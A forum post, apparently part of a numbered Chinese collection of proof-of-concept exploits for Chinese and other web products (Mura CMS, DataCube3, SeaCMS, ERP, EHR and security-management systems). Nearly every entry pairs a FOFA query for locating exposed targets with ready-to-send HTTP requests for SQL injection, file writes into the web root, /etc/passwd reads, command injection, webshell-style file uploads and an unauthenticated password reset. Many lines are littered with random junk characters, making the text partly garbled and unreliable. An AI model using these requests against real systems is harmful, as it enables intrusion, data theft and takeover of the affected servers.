FOFA:app="REALOR-天翼应用虚拟化系统"
: s1 N: d- K0 Y0 t: D# ]GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
4 B; D! m+ l' ?' g, |- pHost: host
% p% U }" B# _+ W7 U& M5 g C3 ^1 v5 G7 H1 S
& ~: l5 |4 V% b3 \
186. F-logic DataCube3 SQL注入
! z# Z& X& d; k% s( a& uCVE-2024-31750
' J) t2 F# ~! \, a3 \) K) GF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统1 d7 U! I6 @; x2 B, H' S
FOFA:title=="DataCube3"
0 f8 Z0 N. h8 y2 BPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
$ J5 f, d: D/ A" i8 AHost: your-ip
, J; e. ^* V M7 m1 a2 I5 y% KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0' H8 c/ a6 `; L; b: @5 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
. b1 Y9 {6 k& s8 [- uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 u f& O! ?% a+ _- S6 F! KAccept-Encoding: gzip, deflate! [; j+ t0 b: ?- x" U' N' a
Connection: close% X( i M3 f, l+ c3 |1 R$ F' c. Z1 G
Content-Type: application/x-www-form-urlencoded$ Q/ u' Z5 L/ ~* \
$ b% L2 e% l) J3 _) H) K. t; H
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450# m: Q6 D: L3 k% `
* H" y$ A: r- J0 v4 `1 s$ [, d+ o0 J
# n5 w$ t- E2 m( M3 B187. Mura CMS processAsyncObject SQL注入4 |* i3 {/ B, g0 S/ Z0 a
CVE-2024-32640' u% t) x6 ?: @, I) D
FOFA:"Mura CMS"9 N7 a+ y7 k) n
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1% o( |- V8 t7 a
Host: your-ip, T( y; m7 J! H T+ q0 z
Content-Type: application/x-www-form-urlencoded
( W. ]* \3 j. ^+ |1 v7 m* C' y, c7 u6 ]: b
4 s/ R7 P% _* p/ Q
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
1 q# W# D, q0 K- o E
- L; c0 Z/ h) M% u0 T' B% N. l0 a# t; Y
188. 叁体-佳会视频会议 attachment 任意文件读取
9 H6 G& E4 f3 Yversion <= 3.9.7) `% O) g" G5 r+ c& R* D
FOFA:body="/system/get_rtc_user_defined_info?site_id"8 N% U ?6 z. {5 ~4 x9 x$ w
GET /attachment?file=/etc/passwd HTTP/1.1) R1 R: d% l, k Z" {
Host: your-ip
- ^0 l+ b9 k d9 d; m7 u9 Q2 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' p1 l Q, e1 j' u% b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( G& `5 {* ?* z" W6 w* p
Accept-Encoding: gzip, deflate3 U t! R' u, k: d
Accept-Language: zh-CN,zh;q=0.9,en;q=0.88 ~* p. A8 N1 i2 J
Connection: close4 i4 t8 X) I, h C9 s4 T+ ?
/ B1 h/ p/ I/ x0 {
+ A& L/ s: p5 t1 F: X189. 蓝网科技临床浏览系统 deleteStudy SQL注入
, \7 x7 ~7 y3 [ L4 s- k4 BFOFA:app="LANWON-临床浏览系统"
& E! J" p y& X/ x# v$ `GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1$ Z3 H' \( W7 C
Host: your-ip$ E* R: b1 B3 A V3 `. @0 l
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ Y$ t* R/ D8 S% O( }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* D3 {5 I! e8 K' I6 u% F
Accept-Encoding: gzip, deflate
2 ?+ J- a0 I: kAccept-Language: zh-CN,zh;q=0.9$ T! @' [, T' e* h7 v
Connection: close
6 G6 l+ z% U/ L ^* ?, R0 Y# D0 d: l5 H5 ]; \
K7 K4 s% g7 o- E. R/ L; R' \. F190. 短视频矩阵营销系统 poihuoqu 任意文件读取. o& j% o2 _) c! X0 x# l$ B, ] X
FOFA:title=="短视频矩阵营销系统"" w0 M ~3 `( ]9 d5 a- c
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
$ o! o' m: P/ _; [$ ` {Host: your-ip8 l2 \' }) \: y: b: Z9 J7 f) j, ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
, n; M" S6 b, @7 I* F1 g; qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.94 Z. o5 u+ E7 m. ?
Content-Type: application/x-www-form-urlencoded; o1 U# c) l2 c* C5 v
Accept-Encoding: gzip, deflate' [8 ^( p' G: t5 |. P- \: {2 ^+ E
Accept-Language: zh-CN,zh;q=0.9
" d& s: N7 D: v( S7 L4 ^0 u) V, ~/ L$ O! [4 p, _
poi=file:///etc/passwd
. m6 x8 }* C) J5 i( J1 [- J2 q- Q8 n& {& Y+ q2 y
( K- l7 L5 t' f0 g' k
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
4 x' u; }+ I5 JFOFA:body="/CDGServer3/index.jsp"# V& B U! N p* E! E; q' Q ^
POST /CDGServer3/js/../NavigationAjax HTTP/1.1, z; \/ I+ t. J
Host: your-ip
: L* n/ G, @) P, B2 W4 o' sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( T0 b/ a! p: n9 x, H' k6 a7 wContent-Type: application/x-www-form-urlencoded8 Q, [' c$ {; |6 f; D; Z
( [0 n( p9 ^; ~0 x
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=2 o) Y: {! o' J
4 t1 M7 p. Q1 n6 V6 U- l( y. O3 ~5 g" u4 o Z$ n' Q' P0 h
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传( J! p, Q7 W; A7 |
FOFA:title="用户登录_富通天下外贸ERP"$ j* { Q& m# p! k
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
4 V, t. U; k3 W* ?9 ]3 EHost: your-ip0 Y8 o2 w- B- j. x' V6 o2 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.367 y9 ^& B3 K. |5 S/ A; Y6 p
Content-Type: application/x-www-form-urlencoded
7 @% G0 p3 q3 |& T/ s9 z
3 a( R0 X! L1 \5 L
. C! c& C" F4 b: V8 b<% @ webhandler language="C#" class="AverageHandler" %>4 x6 N! n" `# B" B0 n
using System;
- v- i3 Q7 C( p( I, Nusing System.Web;
! M& w+ n. D. Y! P& Z+ ?4 kpublic class AverageHandler : IHttpHandler
* H$ M4 @8 b' x5 W{
5 p% D v# f v0 e5 Z2 P8 Upublic bool IsReusable4 u9 z/ h% J, O! R7 T
{ get { return true; } }
0 c& ^/ O' y H6 x `0 I9 z- @5 @public void ProcessRequest(HttpContext ctx)
- e2 B' Y+ |# A. v{* h" a* k/ u) ]5 i. [
ctx.Response.Write("test");: S( }$ h2 {% J) I; D [5 x
}
T' e9 ^* F2 r/ G( A Q0 Q- M}; t$ ?+ _% k, K( }& ` o. n$ K
* v8 Q$ ~7 m& I" }5 f$ c
/ N* i6 }8 ]+ u% e2 B% y# z5 X: o: [193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行 }; h! s0 s8 g
FOFA:body="山石云鉴主机安全管理系统"$ X& }' j7 U/ O" k; U* y
GET /master/ajaxActions/getTokenAction.php HTTP/1.1' c5 s f# k! n9 B( L7 g
Host:$ X9 W" V* T0 F5 {! k2 ^
Cookie: PHPSESSID=2333333333333;
$ p: c) G) B' I( Z$ ~- r8 FContent-Type: application/x-www-form-urlencoded
# }& u* u9 m$ b6 o& I3 xUser-Agent: Mozilla/5.0: q2 ^5 ]3 Y$ U
; K- i" r* Y. l. [ P
8 A6 H* u7 k4 z$ z c% R
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
# `# W" |; Q0 @$ z) T$ V. qHost:- J+ T; _& n! b4 J5 q
User-Agent: Mozilla/5.0
6 d5 x, R; [$ B: TAccept-Encoding: gzip, deflate
+ X! M" _3 L. N. [. K( ]Accept: */*7 d3 U/ O! t5 [3 ?
Connection: close4 @+ ~( j+ c) k+ C
Cookie: PHPSESSID=2333333333333;2 \. H! `+ A- t1 |" O, V0 |$ T
Content-Type: application/x-www-form-urlencoded" }9 J2 G- C1 S7 W' f, b6 ?
Content-Length: 84* `/ M- |. x8 C8 ?8 [# s
' p& o9 G0 _0 v( x& v, uparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')2 ]2 N% s' W0 J, @. e+ b
' v. ^: C1 Y9 b6 k" d( _* s! q* Y5 J
GET /master/img/config HTTP/1.1- i$ Q6 V7 G: H
Host:7 j% e8 Z2 o2 N# w0 H0 n: B3 r
User-Agent: Mozilla/5.0
3 W& J3 T; p, B. X0 Y- N# |' n: i: U5 z. a( B
4 l+ i) L y8 ?
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传* y9 K0 O# s2 x+ ^6 T% l
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在7 E; q3 \9 u* v% }2 w
7 \* H+ S, q0 o2 |% T w5 f4 M3 {, wPOST /servlet/uploadAttachmentServlet HTTP/1.1# w7 F* M1 R5 {: K$ v3 z7 Z
Host: host
, _& J/ I8 f4 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
8 _9 X/ W: b1 R7 r7 ]: EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" z: w( \4 A4 {; J: H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
D. C7 E5 G1 B& BAccept-Encoding: gzip, deflate1 ]) k+ q* F7 j% c9 u
Connection: close
) e5 Z( s) O0 @* ?" F% IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
# n+ P/ f3 m$ @------WebKitFormBoundaryKNt0t4vBe8cX9rZk" ^2 T) M. z' x- g- a7 R* ~
8 _/ B9 m! f7 \( S4 n# E! f; J( \# E A2 n
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
; U& n# _' r, p) M3 N$ cContent-Type: text/plain
5 r9 o: I' m ^# \% a<% out.println("hello");%>5 N; }+ z0 H; V+ h' v
------WebKitFormBoundaryKNt0t4vBe8cX9rZk$ c- x0 Z, Z5 n. Y$ v: O
Content-Disposition: form-data; name="json"
0 F' a) T k. I; Z& u {"iq":{"query":{"UpdateType":"mail"}}}
4 |1 U7 }1 h1 k) f, r/ D7 e------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
8 l+ e* T: K$ \7 Y/ ^0 D& Y5 G) r" D8 h' o( \" h2 {" k: ^/ T4 p/ w) m5 o
8 w; u2 Z k5 P195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
6 o" ~1 T- L L* N" X# g3 B( oFOFA:title=="飞鱼星企业级智能上网行为管理系统
! j6 Q; ~4 O; Z( CPOST /send_order.cgi?parameter=operation HTTP/1.1, P+ O. G; m u# l4 @" V
Host: 127.0.0.1- q2 B3 C) [& y1 u7 c1 C
Pragma: no-cache
9 c9 e+ J* h6 U" C! g- F7 QCache-Control: no-cache/ A# _9 \$ d1 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36# ^3 z7 C& x; A. }
Accept: */*' v7 z2 S; O7 v P
Accept-Encoding: gzip, deflate# V8 u& C1 x& e/ O* X& B+ y
Accept-Language: zh-CN,zh;q=0.94 e- R/ [8 u( y6 o6 M! T
Connection: close& ^ Q6 p5 [- n, X
Content-Type: application/x-www-form-urlencoded% A, `% n6 f4 ^' C/ Z2 r: o
Content-Length: 68
& @* F9 [) L( w/ j7 }7 G3 X' `( f E5 v1 R
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"} } U( I1 z- c
2 [8 ?7 e9 h' S
, }/ L+ X# v# x
196. 河南省风速科技统一认证平台密码重置& m7 D/ r% }8 a; s- {& d3 _5 Y% `
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
6 {" U: T; T* e. c) S+ }& Y, XPOST /cas/userCtl/resetPasswordBySuper HTTP/1.14 t8 g9 ]$ o+ R; |. \ f9 c; r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# \; _3 Y7 U4 c r0 E. L
Content-Type: application/json;charset=UTF-8
" n6 ~3 B$ W' j0 R, X! ]; r8 ?X-Requested-With: XMLHttpRequest8 {8 _: m, u$ B- c- Q
Host:1 W c$ u- q3 n, |5 l1 y
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2. P" p, W% O+ J: o+ [
Content-Length: 45. B6 Q; R/ q8 X2 \
Connection: close
& T/ i m7 R/ r2 b
; O, T7 S+ |! A/ p3 `0 ^" R{"xgh":"test","newPass":"test666","email":""}4 h8 Q/ R9 T/ o* N1 l# ~$ o9 A- J
8 m/ C' Q$ [1 j: r; u7 g- I" m- k" a. M9 ]+ P# z
: z% }: i$ T- W1 y8 y6 Y; v/ K0 y7 j
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
8 m, h( Q& I# }* A4 d+ O" BFOFA:app="浙大恩特客户资源管理系统"# r, X/ G% F; ^( x$ t# k
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
$ Z6 x( o" x5 f" ^( {/ eHost:
. F; q% b' i: D4 }9 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.367 `7 V4 P3 u# x+ `3 K) N4 x% P
Accept-Encoding: gzip, deflate" ~& u. U$ Q+ y+ F
Connection: close
9 |+ y) ?0 p# \* {+ x
' v- Q/ Q, C( ]4 l3 g2 ]2 M' j
3 O9 ^) ?8 e* S x6 e. e4 y* G+ S# P" v
198. 阿里云盘 WebDAV 命令注入
# I7 D. X/ N% q( s* gCVE-2024-29640 G4 Q3 q1 X. {7 j4 n* C
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
( c6 I2 t8 z( j4 P6 a5 n) e) G: ~Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
7 v( j0 ?/ Z4 D( wAccept: */*# q [' a& `0 v" @( X
Accept-Encoding: gzip, deflate
S- H( y5 i9 V3 i* SAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6+ w1 \9 _6 s3 _$ B
Connection: close
/ U9 q; Y. ^1 o* C5 [9 V
3 i7 m* e9 @2 w7 I) S8 A$ r5 i% _- c+ h \0 K6 E+ E4 N- v. f
199. cockpit系统assetsmanager_upload接口 文件上传# U6 {, [' s: I* A
/ k" _! C: M: c( ]6 p+ g, @# @
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
' H) e! G' b0 ?, D" I. O: ] N9 K) B2 p2 mGET /auth/login?to=/ HTTP/1.1 e) @4 L# T4 ~$ `& a
9 B4 @" V$ e. e0 h响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
" w0 ^: Y0 e4 }+ Y: M- D1 a m: C/ D+ g$ u' |+ B0 n; f
2.使用刚才上一步获取到的jwt获取cookie:
* H6 C3 y8 e# ?& l5 R k& K( u( i, @ k9 J4 Q
POST /auth/check HTTP/1.1
1 {- Z, H, ?7 S" ?3 jContent-Type: application/json2 t5 N' F" t! Y- G+ _; L& L' n
1 m% @* C6 }" J0 q/ ]' z{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
' D* \8 P0 Y# |. k u ^ K, [/ G% [" i8 o
响应:200,返回值:$ l& p2 X6 p+ O5 t) m# _
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
5 W8 _$ A- Y, R: b0 f& L1 fFofa:title="Authenticate Please!"
' _6 g1 a4 [1 _% V/ D8 t) QPOST /assetsmanager/upload HTTP/1.1
* y2 G$ ^' Y9 [) H# z5 D* _9 TContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3" K! x( A% M. L+ ]. r: N5 t
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92) \/ [, y) r' ?6 ~
$ K# u# z. ~& W; u/ ~-----------------------------36D28FBc36bd6feE7Fb31 c: a2 t' \& W$ \# D
Content-Disposition: form-data; name="files[]"; filename="tttt.php"1 g. S1 o9 d" V( y" z/ k* E
Content-Type: text/php3 F" p1 H4 x4 r9 _
$ I- d$ h$ u2 o) Z9 T" W- b5 ?
<?php echo "tttt";unlink(__FILE__);?>
3 N( |7 U- c2 i$ D. ]1 q-----------------------------36D28FBc36bd6feE7Fb32 ~- l; @3 r7 d" X: H3 K3 |
Content-Disposition: form-data; name="folder"' j/ z8 b' [9 H6 j5 A
; Q: i' [ `5 h( l% e0 f( s. y; X
-----------------------------36D28FBc36bd6feE7Fb3--
7 o$ M5 f% a1 V* \5 V+ d" t) _- ]# _* D- v" h$ Z7 z
D: q- U5 b/ E* Z8 n" @. v9 i/storage/uploads/tttt.php
( x" I# w% P$ ^$ k' g' S: y* ?
8 r; b3 a+ C3 l, T1 V- O0 B7 a5 s! T200. SeaCMS海洋影视管理系统dmku SQL注入
, ~6 {& C2 r9 o) f6 O3 v3 k7 xFOFA:app="海洋CMS"+ F& I) A' Q R: L* D
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
: [( z' S9 V$ U9 @4 CCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
9 J% p$ T3 ~4 y3 F/ H1 ]" d4 {Upgrade-Insecure-Requests: 15 I- f* l: {( V1 {4 c
Cache-Control: max-age=0
2 H3 c0 s( y" a4 t+ ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 b" k) o$ X8 d f
Accept-Encoding: gzip, deflate) d( ]+ W# N# f+ m |' O
Accept-Language: zh-CN,zh;q=0.9
/ l! @; ~3 o9 [) C c! J. @3 j+ M! Y/ T) W- S
! s5 d, k# Z. ~" h6 M# H
201. 方正全媒体新闻采编系统 binary SQL注入
4 d+ g# Z. S' [: E* r9 _FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"7 @8 D& O2 Y, R; z5 Y, Q' E( ^
POST /newsedit/newsplan/task/binary.do HTTP/1.17 n' [ U ?- @7 L6 H
Content-Type: application/x-www-form-urlencoded( a9 G! \, u1 u( Z: |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 x2 s& R6 |; f% S" m' z: ~Accept-Encoding: gzip, deflate
6 N; b* _9 m l5 h# }Accept-Language: zh-CN,zh;q=0.9
, Z+ J! p8 F3 f# g5 K1 g' ]Connection: close
: J1 C& b m) d' W( B+ v* Y
+ w* t; p+ ?2 e( b( z% L$ {TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
* d: f- \! B4 k& n. h6 x
9 r3 [. [$ t/ j2 Y7 F4 G
: C9 s: @* K7 V# L. n202. 微擎系统 AccountEdit任意文件上传
# o7 d+ C3 n' I9 V; jFOFA:body="/Widgets/WidgetCollection/"7 e: H# j8 c5 `" y0 [
获取__VIEWSTATE和__EVENTVALIDATION值
2 }+ n* x# _9 ]. C. Z9 z6 ]GET /User/AccountEdit.aspx HTTP/1.1) }/ J7 k0 p4 R: h
Host: 滑板人之家; ]) H2 j, s9 e$ |1 p6 ^' O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
3 D: D) b$ I6 e" f' N) [! C- P1 MContent-Length: 0' c6 h5 W* }8 B6 c
$ k( b3 F( p+ L" W
$ t5 X3 i3 }9 @8 q# s替换__VIEWSTATE和__EVENTVALIDATION值: N3 O! W2 {1 q/ `5 O2 v( K
POST /User/AccountEdit.aspx HTTP/1.1
; y G, t) {7 ?4 p' |% b' a; BAccept-Encoding: gzip, deflate, br
" K& p; g4 w1 g: u" Z9 Q* r! B9 gContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
& ~; q' u5 c+ |# j9 j: Q* C
$ `2 d0 N5 p. a( W6 T* i-----------------------------786435874t38587593865736587346567358735687
2 ?) ?6 p0 e( H+ c7 ]Content-Disposition: form-data; name="__VIEWSTATE"
& Z" f! m+ ?. o( {1 i
# d4 U# _! V* i( W7 I' f__VIEWSTATE
9 v, \8 U; B2 l$ O: C6 d+ q-----------------------------786435874t38587593865736587346567358735687
8 W% u( @$ q+ c' v8 \3 {. HContent-Disposition: form-data; name="__EVENTVALIDATION"2 L6 K) K, h) y
3 V0 Z# U8 m( h$ @" C2 H
__EVENTVALIDATION
u! {+ n% r3 o7 G5 U$ n-----------------------------786435874t38587593865736587346567358735687
( P1 K- D. m" @. A" y/ E9 RContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
! H; M6 ^2 D9 g8 [4 ?Content-Type: text/plain
4 l9 h+ d% c6 ~/ h* y% @- [; c" `! Y% ~& R0 y O
Hello World!# a/ l5 G3 O4 [0 @0 X8 {9 N m& g
-----------------------------786435874t38587593865736587346567358735687
0 p6 z, t8 `7 v* P8 dContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"- p8 ^2 S0 ^2 j1 E0 P8 T! [
j" g/ S" P* m2 R4 B+ R
上传图片
! T+ ]1 X4 M! [-----------------------------786435874t38587593865736587346567358735687
7 }) u9 ~" ~6 P. ~; ~Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
& G- P/ s% F" p/ @$ S+ U) l# R) U$ b" K o
9 @6 n. G, ~. m% v) b) n-----------------------------786435874t385875938657365873465673587356879 L' m* t0 t: W1 I# W
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"% E0 ]2 W0 D5 ~5 A1 w$ i M4 t7 ?
4 v1 \# M# d5 U8 D/ U8 A" ~
: s" w- l& D1 H9 i; c# r-----------------------------786435874t38587593865736587346567358735687--
# H! \$ l7 D+ G1 o( o# I9 f
" S9 h) g3 ?3 `& u4 n# n2 @
3 S4 Y& H) ` A7 f( v, E- l$ Z1 w$ }& J/_data/Uploads/1123.txt0 [6 m; T* j3 ?( P+ w) p3 |
" d/ x+ Y- C4 z* X( g
203. 红海云EHR PtFjk 文件上传
2 ]# [( d, ^6 m! k \7 x, eFOFA:body="RedseaPlatform"
. d3 q0 |5 P. _% G# t3 L: }POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.14 u: h* V5 E0 H/ W, @. D( h
Host: x.x.x.x
3 c* f4 u. q% `' x0 SAccept-Encoding: gzip4 |( }7 b8 ^0 f J: N3 |# H0 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ ~. h+ v, b& K* r/ Q5 AContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys45 R+ H8 R _3 X
Content-Length: 210
1 O' }% H% X* |5 e8 U0 ?6 O5 D1 @, S& B* F
------WebKitFormBoundaryt7WbDl1tXogoZys4
. {$ c @( X. V/ m/ B" Q) J4 DContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
. x& G: K+ K8 U- D! t; F) L! ^2 E: {- ?Content-Type:image/jpeg' ^# h; c0 B# H+ f% T. p; ]1 p
u# e* ]6 q% N" `: U<% out.print("hello,eHR");%>
, o# q. R8 l% i------WebKitFormBoundaryt7WbDl1tXogoZys4--" q% y& Z3 Y) f2 B
# J" j2 }% P/ _1 W0 u: m5 _ 8 U; k! T& [, B1 c6 f
# ?6 C- l! G& g$ Z3 h( m% x0 q
5 B4 r3 M' N% n
8 U' z5 H( s2 v8 i- F" x6 z O
& w' }0 B% b& l( {3 B0 [* s |
发表于 2024-6-5 14:31:29
收藏
支持
反对